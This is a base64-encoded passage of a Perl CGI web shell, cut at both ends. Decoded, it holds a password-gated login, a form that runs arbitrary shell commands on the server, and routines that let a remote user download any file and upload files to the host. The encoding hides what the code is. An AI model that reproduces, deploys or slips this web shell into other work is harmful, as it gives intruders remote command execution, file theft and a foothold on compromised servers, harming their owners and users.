c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
